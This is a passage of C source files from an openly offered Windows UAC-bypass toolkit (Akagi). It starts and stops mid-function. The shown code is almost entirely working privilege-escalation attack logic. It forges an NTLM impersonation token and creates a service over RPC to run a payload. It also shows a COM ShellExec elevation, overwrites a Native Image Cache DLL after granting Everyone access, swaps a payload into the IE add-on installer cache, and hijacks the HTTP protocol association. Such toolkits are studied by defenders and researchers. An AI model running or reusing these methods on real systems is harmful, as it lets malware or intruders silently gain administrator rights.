ucmxRpcAppendRequestData_Dword(&RpcConnection, SC_MANAGER_ALL_ACCESS);\n\n if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_OPEN_SC_MANAGERW))\n break;\n\n if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER)\n break;\n\n dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[20];\n if (dwReturnValue != 0)\n break;\n\n RtlCopyMemory(bServiceManagerObject, &RpcConnection.bProcedureOutputData[0], sizeof(bServiceManagerObject));\n\n //\n // CreateService RPC request.\n //\n ucmxRpcInitializeRequestData(&RpcConnection);\n ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceManagerObject, sizeof(bServiceManagerObject), FALSE);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);\n ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)szServiceName, dwServiceNameLength, TRUE);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ALL_ACCESS);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_WIN32_OWN_PROCESS);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_DEMAND_START);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ERROR_IGNORE);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);\n ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)lpszPayload, dwServiceCommandLineLength, TRUE);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n\n if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_CREATE_SERVICEW))\n break;\n\n if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_CREATE_SERVICE)\n break;\n\n dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[24];\n if (dwReturnValue != 0)\n break;\n\n RtlCopyMemory(bServiceObject, &RpcConnection.bProcedureOutputData[4], sizeof(bServiceObject));\n\n //\n // StartService RPC request.\n //\n ucmxRpcInitializeRequestData(&RpcConnection);\n ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n\n if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_START_SERVICEW))\n break;\n\n if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_START_SERVICE)\n break;\n\n dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];\n if (dwReturnValue != 0 && dwReturnValue != ERROR_SERVICE_REQUEST_TIMEOUT)\n break;\n\n //\n // DeleteService RPC request.\n //\n ucmxRpcInitializeRequestData(&RpcConnection);\n ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);\n\n if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_DELETE_SERVICE))\n break;\n\n if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_DELETE_SERVICE)\n break;\n\n dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];\n if (dwReturnValue != 0)\n break;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (RpcConnection.hFile != INVALID_HANDLE_VALUE)\n CloseHandle(RpcConnection.hFile);\n\n return bResult;\n}\n\nSECURITY_STATUS ucmxForgeNetworkAuthToken(\n _Out_ PHANDLE TokenHandle\n) {\n\n CredHandle hCredClient, hCredServer;\n TimeStamp lifetimeClient, lifetimeServer;\n SecBufferDesc negotiateDesc, challengeDesc, authenticateDesc;\n SecBuffer negotiateBuffer, challengeBuffer, authenticateBuffer;\n CtxtHandle clientContextHandle, serverContextHandle;\n ULONG clientContextAttributes, serverContextAttributes;\n SECURITY_STATUS secStatus;\n HANDLE hTokenNetwork = NULL;\n\n *TokenHandle = NULL;\n serverContextHandle.dwLower = 0;\n serverContextHandle.dwUpper = 0;\n clientContextHandle.dwLower = 0;\n clientContextHandle.dwUpper = 0;\n hCredServer.dwLower = 0;\n hCredServer.dwUpper = 0;\n\n RtlSecureZeroMemory(&negotiateBuffer, sizeof(negotiateBuffer));\n RtlSecureZeroMemory(&challengeBuffer, sizeof(challengeBuffer));\n RtlSecureZeroMemory(&authenticateBuffer, sizeof(authenticateBuffer));\n\n do {\n\n secStatus = AcquireCredentialsHandle(NULL,\n (LPWSTR)NTLMSP_NAME,\n SECPKG_CRED_OUTBOUND,\n NULL,\n NULL,\n NULL,\n NULL,\n &hCredClient,\n &lifetimeClient);\n\n if (!NT_SUCCESS(secStatus))\n break;\n\n secStatus = AcquireCredentialsHandle(NULL,\n (LPWSTR)NTLMSP_NAME,\n SECPKG_CRED_INBOUND,\n NULL,\n NULL,\n NULL,\n NULL,\n &hCredServer,\n &lifetimeServer);\n\n if (!NT_SUCCESS(secStatus))\n break;\n\n negotiateDesc.ulVersion = 0;\n negotiateDesc.cBuffers = 1;\n negotiateDesc.pBuffers = &negotiateBuffer;\n negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE;\n negotiateBuffer.BufferType = SECBUFFER_TOKEN;\n negotiateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);\n if (negotiateBuffer.pvBuffer == NULL) {\n secStatus = SEC_E_INSUFFICIENT_MEMORY;\n break;\n }\n\n secStatus = InitializeSecurityContext(&hCredClient,\n NULL,\n NULL,\n ISC_REQ_DATAGRAM,\n 0,\n SECURITY_NATIVE_DREP,\n NULL,\n 0,\n &clientContextHandle,\n &negotiateDesc,\n &clientContextAttributes,\n &lifetimeClient);\n\n if (!NT_SUCCESS(secStatus))\n break;\n\n challengeDesc.ulVersion = 0;\n challengeDesc.cBuffers = 1;\n challengeDesc.pBuffers = &challengeBuffer;\n challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE;\n challengeBuffer.BufferType = SECBUFFER_TOKEN;\n challengeBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);\n if (challengeBuffer.pvBuffer == NULL) {\n secStatus = SEC_E_INSUFFICIENT_MEMORY;\n break;\n }\n\n secStatus = AcceptSecurityContext(&hCredServer,\n NULL,\n &negotiateDesc,\n ASC_REQ_DATAGRAM,\n SECURITY_NATIVE_DREP,\n &serverContextHandle,\n &challengeDesc,\n &serverContextAttributes,\n &lifetimeServer);\n\n if (!NT_SUCCESS(secStatus))\n break;\n\n authenticateDesc.ulVersion = 0;\n authenticateDesc.cBuffers = 1;\n authenticateDesc.pBuffers = &authenticateBuffer;\n authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE;\n authenticateBuffer.BufferType = SECBUFFER_TOKEN;\n authenticateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);\n if (authenticateBuffer.pvBuffer == NULL) {\n secStatus = SEC_E_INSUFFICIENT_MEMORY;\n break;\n }\n\n secStatus = InitializeSecurityContext(NULL,\n &clientContextHandle,\n NULL,\n 0,\n 0,\n SECURITY_NATIVE_DREP,\n &challengeDesc,\n 0,\n &clientContextHandle,\n &authenticateDesc,\n &clientContextAttributes,\n &lifetimeClient);\n\n if (!NT_SUCCESS(secStatus))\n break;\n\n secStatus = AcceptSecurityContext(NULL,\n &serverContextHandle,\n &authenticateDesc,\n 0,\n SECURITY_NATIVE_DREP,\n &serverContextHandle,\n NULL,\n &serverContextAttributes,\n &lifetimeServer);\n\n if (!NT_SUCCESS(secStatus))\n break;\n\n secStatus = QuerySecurityContextToken(&serverContextHandle, &hTokenNetwork);\n\n } while (FALSE);\n\n if (negotiateBuffer.pvBuffer)\n supHeapFree(negotiateBuffer.pvBuffer);\n if (challengeBuffer.pvBuffer)\n supHeapFree(challengeBuffer.pvBuffer);\n if (authenticateBuffer.pvBuffer)\n supHeapFree(authenticateBuffer.pvBuffer);\n\n FreeCredentialsHandle(&hCredClient);\n FreeCredentialsHandle(&hCredServer);\n\n DeleteSecurityContext(&clientContextHandle);\n DeleteSecurityContext(&serverContextHandle);\n\n *TokenHandle = hTokenNetwork;\n return secStatus;\n}\n\n/*\n* ucmSspiDatagramMethod\n*\n* Purpose:\n*\n* Bypass UAC using SSPI datagram context.\n* \n* Fixed by MS ninja patch (including old Win10 releases).\n*\n*/\nNTSTATUS ucmSspiDatagramMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOL bNeedCleanup = FALSE, bImpersonate = FALSE;\n SECURITY_IMPERSONATION_LEVEL impLevel;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HANDLE hToken = NULL;\n WCHAR szLoaderFileName[MAX_PATH * 2];\n\n //\n // Forge token for impersonation.\n //\n MethodResult = ucmxForgeNetworkAuthToken(&hToken);\n if (!NT_SUCCESS(MethodResult))\n return MethodResult;\n\n do {\n\n MethodResult = STATUS_ACCESS_DENIED;\n\n //\n // Write loader to the %temp%\n //\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n AKATSUKI_ENTRYPOINT_EXE,\n TRUE))\n {\n break;\n }\n\n RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));\n _strcpy(szLoaderFileName, g_ctx->szTempDirectory);\n _strcat(szLoaderFileName, THEOLDNEWTHING);\n _strcat(szLoaderFileName, TEXT(\".exe\"));\n\n bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);\n if (!bNeedCleanup)\n break;\n\n bImpersonate = ImpersonateLoggedOnUser(hToken);\n if (!bImpersonate)\n break;\n\n if (!supGetThreadTokenImpersonationLevel(NtCurrentThread(), &impLevel))\n break;\n\n if (impLevel < SecurityImpersonation)\n break;\n\n if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (bImpersonate)\n RevertToSelf();\n\n if (hToken)\n CloseHandle(hToken);\n\n if (bNeedCleanup)\n DeleteFile(szLoaderFileName);\n\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/methods/api0cradle.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n* TITLE: API0CRADLE.C\n*\n* VERSION: 3.61\n*\n* DATE: 22 Jun 2022\n*\n* UAC bypass method from Oddvar Moe aka api0cradle.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmCMLuaUtilShellExecMethod\n*\n* Purpose:\n*\n* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nNTSTATUS ucmCMLuaUtilShellExecMethod(\n _In_ LPWSTR lpszExecutable\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT r, hr_init;\n ICMLuaUtil* CMLuaUtil = NULL;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n r = ucmAllocateElevatedObject(\n T_CLSID_CMSTPLUA,\n &IID_ICMLuaUtil,\n CLSCTX_LOCAL_SERVER,\n (void**)&CMLuaUtil);\n\n if (r != S_OK)\n break;\n\n if (CMLuaUtil == NULL)\n break;\n\n r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,\n lpszExecutable,\n NULL,\n NULL,\n SEE_MASK_DEFAULT,\n SW_SHOW);\n\n if (SUCCEEDED(r))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (CMLuaUtil != NULL) {\n CMLuaUtil->lpVtbl->Release(CMLuaUtil);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/methods/azagarampur.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2020 - 2025\n*\n* TITLE: AZAGARAMPUR.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* UAC bypass methods from AzAgarampur.\n*\n* For description please visit original URL\n*\n* https://github.com/AzAgarampur/byeintegrity-uac\n* https://github.com/AzAgarampur/byeintegrity2-uac\n* https://github.com/AzAgarampur/byeintegrity3-uac\n* https://github.com/AzAgarampur/byeintegrity4-uac\n* https://github.com/AzAgarampur/byeintegrity-lite\n* https://github.com/AzAgarampur/byeintegrity7-uac\n* https://github.com/AzAgarampur/byeintegrity8-uac\n* https://github.com/AzAgarampur/byeintegrity9-uac\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n#ifdef _WIN64\n#include \"pcasvc/w7/x64/pcasvc7_64.h\"\n#include \"pcasvc/w8_10/x64/pcasvc64.h\"\n#else\n#include \"pcasvc/w7/x86-32/pcasvc7_32.h\"\n#include \"pcasvc/w8_10/x86-32/pcasvc32.h\"\n#endif\n\n/*\n* ucmxNgenLogLastWrite\n*\n* Purpose:\n*\n* Query ngen.log last write time.\n*\n*/\nBOOL ucmxNgenLogLastWrite(\n _Out_ FILETIME* LastWriteTime\n)\n{\n BOOL bResult = FALSE;\n HANDLE hFile;\n WCHAR szFileName[MAX_PATH * 2];\n\n LastWriteTime->dwLowDateTime = 0;\n LastWriteTime->dwHighDateTime = 0;\n\n _strcpy(szFileName, g_ctx->szSystemRoot);\n _strcat(szFileName, MSNETFRAMEWORK_DIR);\n\n#ifdef _WIN64\n _strcat(szFileName, TEXT(\"64\"));\n#endif\n\n _strcat(szFileName, TEXT(\"\\\\\"));\n _strcat(szFileName, NET4_DIR);\n _strcat(szFileName, TEXT(\"\\\\\"));\n _strcat(szFileName, TEXT(\"ngen.log\"));\n\n hFile = CreateFile(szFileName,\n GENERIC_READ,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n 0,\n NULL);\n if (hFile != INVALID_HANDLE_VALUE) {\n bResult = GetFileTime(hFile, NULL, NULL, LastWriteTime);\n CloseHandle(hFile);\n }\n\n return bResult;\n}\n\n/*\n* ucmNICPoisonMethod\n*\n* Purpose:\n*\n* Bypass UAC by by Dll hijack of Native Image Cache.\n*\n*/\nNTSTATUS ucmNICPoisonMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n WCHAR szFileName[MAX_PATH * 2];\n WCHAR szTargetProc[MAX_PATH * 2];\n DWORD origSize = 0, bytesIO;\n PBYTE origFileBuffer = NULL;\n\n HANDLE hFile;\n\n LPWSTR oldSecurity = NULL;\n LPWSTR lpAssemblyFilePath = NULL, lpTargetFileName = NULL;\n\n BOOLEAN IsWin7, bSecurityReset = FALSE;\n\n FILETIME lastWriteTime, checkTime;\n\n INT iRetryCount = 50;\n\n GUID targetMVID;\n FUSION_SCAN_PARAM scanParam;\n\n do {\n\n IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);\n\n if (!fusUtilInitFusion(IsWin7 ? 2 : 4))\n break;\n\n if (!fusUtilGetAssemblyPathByName(ASSEMBLY_ACCESSIBILITY, &lpAssemblyFilePath))\n break;\n\n if (!fusUtilGetImageMVID(lpAssemblyFilePath, &targetMVID))\n break;\n\n if (!IsWin7) {\n\n ucmxNgenLogLastWrite(&lastWriteTime);\n\n //\n // Run NET maintenance tasks.\n //\n _strcpy(szFileName, g_ctx->szSystemDirectory);\n _strcat(szFileName, MSCHEDEXE_EXE);\n\n if (!supRunProcess2(szFileName,\n TEXT(\"Start\"),\n NULL,\n SW_HIDE,\n SUPRUNPROCESS_TIMEOUT_DEFAULT))\n {\n break;\n }\n\n //\n // Wait for task completion.\n //\n\n do {\n\n Sleep(2000);\n\n if (FALSE == supIsProcessRunning(TEXT(\"ngentask.exe\"))) {\n\n if (ucmxNgenLogLastWrite(&checkTime)) {\n\n if (CompareFileTime(&lastWriteTime, &checkTime) < 0) {\n break;\n }\n }\n\n }\n\n --iRetryCount;\n\n } while (iRetryCount);\n\n }\n\n //\n // Locate target NI file.\n //\n scanParam.ReferenceMVID = &targetMVID;\n scanParam.lpFileName = NULL;\n\n _strcpy(szFileName, g_ctx->szSystemRoot);\n _strcat(szFileName, TEXT(\"assembly\\\\NativeImages_\"));\n if (IsWin7)\n _strcat(szFileName, NET2_DIR);\n else\n _strcat(szFileName, NET4_DIR);\n\n#ifdef _WIN64\n _strcat(szFileName, TEXT(\"_64\"));\n#else\n _strcat(szFileName, TEXT(\"_32\"));\n#endif\n _strcat(szFileName, TEXT(\"\\\\Accessibility\\\\\"));\n\n if (!fusUtilScanDirectory(szFileName,\n TEXT(\"*.dll\"),\n (pfnFusionScanFilesCallback)fusUtilFindFileByMVIDCallback,\n &scanParam))\n {\n break;\n }\n\n lpTargetFileName = scanParam.lpFileName;\n if (lpTargetFileName == NULL)\n break;\n\n //\n // Read existing file to memory.\n //\n origFileBuffer = supReadFileToBuffer(lpTargetFileName, &origSize);\n if (origFileBuffer == NULL)\n break;\n\n //\n // Remember old file security permissions.\n //\n oldSecurity = NULL;\n if (!ucmMasqueradedGetObjectSecurityCOM(lpTargetFileName,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n &oldSecurity))\n {\n break;\n }\n\n //\n // Reset target file permissions.\n //\n if (!ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n T_SDDL_ALL_FOR_EVERYONE))\n {\n break;\n }\n\n bSecurityReset = TRUE;\n\n //\n // Overwrite file with Fubuki.\n //\n hFile = CreateFile(lpTargetFileName,\n GENERIC_WRITE,\n 0,\n NULL,\n OPEN_EXISTING,\n 0,\n NULL);\n\n if (hFile != INVALID_HANDLE_VALUE) {\n WriteFile(hFile, ProxyDll, ProxyDllSize, &bytesIO, NULL);\n SetEndOfFile(hFile);\n CloseHandle(hFile);\n }\n else\n break;\n\n //\n // Run target.\n //\n _strcpy(szTargetProc, g_ctx->szSystemDirectory);\n _strcat(szTargetProc, MMC_EXE);\n\n if (supRunProcess2(szTargetProc,\n WF_MSC,\n NULL,\n SW_SHOW,\n SUPRUNPROCESS_TIMEOUT_DEFAULT))\n {\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n if (lpAssemblyFilePath)\n supHeapFree(lpAssemblyFilePath);\n\n //\n // Restore original file contents and permissions.\n //\n if (origFileBuffer) {\n if (lpTargetFileName) {\n hFile = CreateFile(lpTargetFileName,\n GENERIC_WRITE,\n 0,\n NULL,\n OPEN_EXISTING,\n 0,\n NULL);\n\n if (hFile != INVALID_HANDLE_VALUE) {\n WriteFile(hFile, origFileBuffer, origSize, &bytesIO, NULL);\n SetEndOfFile(hFile);\n CloseHandle(hFile);\n }\n }\n\n supVirtualFree(origFileBuffer, NULL);\n }\n\n if (oldSecurity) {\n if (bSecurityReset && lpTargetFileName) {\n ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n oldSecurity);\n }\n CoTaskMemFree(oldSecurity);\n }\n\n if (lpTargetFileName) {\n supHeapFree(lpTargetFileName);\n }\n\n if (!NT_SUCCESS(MethodResult))\n supSetGlobalCompletionEvent();\n\n return MethodResult;\n}\n\n/*\n* ucmIeAddOnInstallMethod\n*\n* Purpose:\n*\n* Bypass UAC by IE Admin Add-On Installer COM object.\n*\n*/\nNTSTATUS ucmIeAddOnInstallMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT r = E_FAIL, hr_init;\n\n IIEAdminBrokerObject* BrokerObject = NULL;\n IActiveXInstallBroker* InstallBroker = NULL;\n\n BSTR adminInstallerUuid = NULL;\n BSTR cacheItemFilePath = NULL, fileToVerify = NULL;\n\n ULONG dummy = 0;\n PUCHAR dummyPtr = NULL;\n\n PWCHAR lpPayloadFile = NULL, lpTargetDir = NULL, lpFileName = NULL, lpDirectory = NULL;\n SIZE_T cchBuffer;\n\n HANDLE processHandle = NULL;\n\n BSTR workdirBstr, emptyBstr;\n\n WCHAR szDummyTarget[MAX_PATH * 2];\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n FUBUKI_DEFAULT_ENTRYPOINT,\n TRUE))\n {\n break;\n }\n\n //\n // VerifyFile required.\n //\n HRESULT_BREAK_ON_FAILED(\n CoInitializeSecurity(NULL,\n -1,\n NULL,\n NULL,\n RPC_C_AUTHN_LEVEL_CONNECT,\n RPC_C_IMP_LEVEL_IMPERSONATE,\n NULL,\n 0,\n NULL));\n\n //\n // Allocated elevated factory object.\n //\n HRESULT_BREAK_ON_FAILED(\n ucmAllocateElevatedObject(T_CLSID_IEAAddonInstaller,\n &IID_IEAxiAdminInstaller,\n CLSCTX_LOCAL_SERVER,\n &BrokerObject));\n\n HRESULT_BREAK_ON_FAILED(\n BrokerObject->lpVtbl->InitializeAdminInstaller(BrokerObject,\n NULL,\n 0,\n &adminInstallerUuid));\n\n //\n // Query install broker object.\n //\n HRESULT_BREAK_ON_FAILED(\n BrokerObject->lpVtbl->QueryInterface(BrokerObject,\n &IID_IEAxiInstaller2,\n &InstallBroker));\n\n _strcpy(szDummyTarget, g_ctx->szSystemDirectory);\n _strcat(szDummyTarget, CONSENT_EXE);\n\n //\n // Verify image embedded signature.\n // Uppon success copy given file to the temporary directory and return full filepath.\n //\n fileToVerify = SysAllocString(szDummyTarget);\n if (fileToVerify) {\n\n r = InstallBroker->lpVtbl->VerifyFile(InstallBroker,\n adminInstallerUuid,\n (HWND)INVALID_HANDLE_VALUE,\n fileToVerify,\n fileToVerify,\n NULL,\n WTD_UI_NONE,\n WTD_UICONTEXT_EXECUTE,\n &IID_IUnknown,\n &cacheItemFilePath,\n &dummy,\n &dummyPtr);\n\n CoTaskMemFree(dummyPtr);\n SysFreeString(fileToVerify);\n }\n\n HRESULT_BREAK_ON_FAILED(r);\n\n //\n // Kill file in cache\n //\n if (!ucmMasqueradedDeleteDirectoryFileCOM(cacheItemFilePath))\n break;\n\n //\n // Replace file in cache with Fubuki.\n //\n cchBuffer = (SIZE_T)SysStringLen(cacheItemFilePath);\n lpPayloadFile = (PWCHAR)supHeapAlloc(cchBuffer * 2);\n if (lpPayloadFile == NULL)\n break;\n\n lpTargetDir = (PWCHAR)supHeapAlloc(cchBuffer * 2);\n if (lpTargetDir == NULL)\n break;\n\n lpFileName = _filename(cacheItemFilePath);\n if (lpFileName == NULL)\n break;\n\n _strcpy(lpPayloadFile, g_ctx->szTempDirectory);\n _strcat(lpPayloadFile, lpFileName);\n\n if (!supWriteBufferToFile(lpPayloadFile, ProxyDll, ProxyDllSize))\n break;\n\n lpDirectory = _filepath(cacheItemFilePath, lpTargetDir);\n if (lpDirectory == NULL)\n break;\n\n if (!ucmMasqueradedMoveCopyFileCOM(lpPayloadFile, lpDirectory, TRUE))\n break;\n\n //\n // Run file from cache.\n //\n workdirBstr = SysAllocString(g_ctx->szTempDirectory);\n if (workdirBstr) {\n\n emptyBstr = SysAllocString(TEXT(\"\"));\n if (emptyBstr) {\n\n r = InstallBroker->lpVtbl->RunSetupCommand(InstallBroker,\n adminInstallerUuid,\n NULL,\n cacheItemFilePath,\n emptyBstr,\n workdirBstr,\n emptyBstr,\n 4, //RSC_FLAG_QUIET\n &processHandle); //there is always no process handle on output, ignore.\n\n SysFreeString(emptyBstr);\n }\n\n SysFreeString(workdirBstr);\n\n if (r == E_INVALIDARG)\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n //\n // Post execution cleanup.\n //\n\n if (InstallBroker)\n InstallBroker->lpVtbl->Release(InstallBroker);\n\n if (BrokerObject)\n BrokerObject->lpVtbl->Release(BrokerObject);\n\n if (adminInstallerUuid)\n SysFreeString(adminInstallerUuid);\n\n if (NT_SUCCESS(MethodResult) && lpDirectory) {\n ucmMasqueradedDeleteDirectoryFileCOM(lpDirectory);\n }\n\n if (cacheItemFilePath)\n SysFreeString(cacheItemFilePath);\n\n if (lpTargetDir)\n supHeapFree(lpTargetDir);\n\n if (lpPayloadFile)\n supHeapFree(lpPayloadFile);\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return MethodResult;\n}\n\n/*\n* ucmWscActionProtocolMethod\n*\n* Purpose:\n*\n* Bypass UAC by SecurityCenter COM object and HTTP protocol registry hijack.\n*\n*/\nNTSTATUS ucmWscActionProtocolMethod(\n _In_ LPCWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT r = E_FAIL, hr_init;\n IWscAdmin* WscAdminObject = NULL;\n\n LPOLESTR protoGuidString = NULL;\n USER_ASSOC_PTR SetUserAssoc;\n GUID guid;\n\n RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n if (CoCreateGuid(&guid) != S_OK)\n break;\n\n if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n break;\n\n MethodResult = supFindUserAssocSet(&SetUserAssoc);\n if (!NT_SUCCESS(MethodResult)) {\n break;\n }\n\n MethodResult = supRegisterShellAssoc(T_PROTO_HTTP,\n protoGuidString,\n &SetUserAssoc,\n lpszPayload,\n FALSE,\n NULL);\n\n if (!NT_SUCCESS(MethodResult)) {\n break;\n }\n\n MethodResult = STATUS_ACCESS_DENIED;\n\n r = ucmAllocateElevatedObject(T_CLSID_SecurityCenter,\n &IID_WscAdmin,\n CLSCTX_LOCAL_SERVER,\n &WscAdminObject);\n\n if (SUCCEEDED(r)) {\n\n r = WscAdminObject->lpVtbl->Initialize(WscAdminObject);\n if (SUCCEEDED(r)) {\n\n supEnableToastForProtocol(T_PROTO_HTTP, FALSE);\n\n r = WscAdminObject->lpVtbl->DoModalSecurityAction(WscAdminObject, NULL, 103, NULL);\n\n Sleep(1000);\n\n if (SUCCEEDED(r)) MethodResult = STATUS_SUCCESS;\n\n }\n }\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (WscAdminObject)\n WscAdminObject->lpVtbl->Release(WscAdminObject);\n\n if (protoGuidString) {\n\n supUnregisterShellAssoc(T_PROTO_HTTP,\n protoGuidString,\n &SetUserAssoc);\n\n CoTaskMemFree(protoGuidString);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return MethodResult;\n}\n\n/*\n* ucmFwCplLuaMethod2\n*\n* Purpose:\n*\n* Bypass UAC using FwCplLua undocumented COM interface and shell association registry hijack.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n* Note:\n*\n* Protocol name defined as const (e.g. pe386).\n* ProgId generated with CoCreateGuid and will be different each run.\n*\n*/\nNTSTATUS ucmFwCplLuaMethod2(\n _In_ LPCWSTR lpszPayload\n)\n{\n BOOL fEnvSet = FALSE, fDirCreated = FALSE;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT r = E_FAIL, hr_init;\n ULONG DataSize = 0, SnapinSize = 0;\n SIZE_T nLen, PayloadDirNameLen = 0, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0, ProtocolNameLen;\n PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;\n PVOID ImageBaseAddress = g_hInstance;\n LPOLESTR protoGuidString = NULL;\n CHAR* pszMarker;\n IFwCplLua* FwCplLua = NULL;\n\n USER_ASSOC_PTR SetUserAssoc;\n GUID guid;\n WCHAR szBuffer[MAX_PATH + 1];\n WCHAR szPayloadDir[MAX_PATH * 2];\n CHAR szProtocol[MAX_PATH];\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n RtlSecureZeroMemory(&szPayloadDir, sizeof(szPayloadDir));\n\n do {\n\n //\n // Create GUID.\n //\n if (CoCreateGuid(&guid) != S_OK)\n break;\n\n if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n break;\n\n //\n // Convert protocol name to ANSI to be used in msc modification next.\n //\n ProtocolNameLen = _strlen(MYSTERIOUSCUTETHING);\n RtlSecureZeroMemory(szProtocol, sizeof(szProtocol));\n 